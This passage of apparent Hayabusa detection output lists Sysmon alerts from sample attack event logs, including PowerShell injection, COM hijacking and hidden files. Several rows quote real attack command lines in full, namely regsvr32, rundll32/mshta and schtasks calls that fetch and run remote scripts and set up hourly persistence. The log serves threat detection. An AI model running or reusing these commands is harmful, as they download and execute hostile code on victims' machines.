Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:18.833 +09:00,IEWIN7,7,high,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Execution - jscript9 engine invoked via clsid : Command: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js : Path: C:\ProgramData\winpm.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 
Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories : Command: attrib +h nbtscan.exe : Path: C:\Windows\System32\attrib.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Hiding Files with Attrib.exe,,rules/sigma/process_creation/win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" : Path: C:\Users\IEUser\Downloads\com-hijack.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c test.bat : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 
+2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c pause : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.518 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /c test.bat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.870 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.279 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:10.161 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla 
Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:12.705 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 
"";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Suspicious MSHTA Process 
Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 13:02:11.307 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,informational,Process Creation,"Command: wmic process list 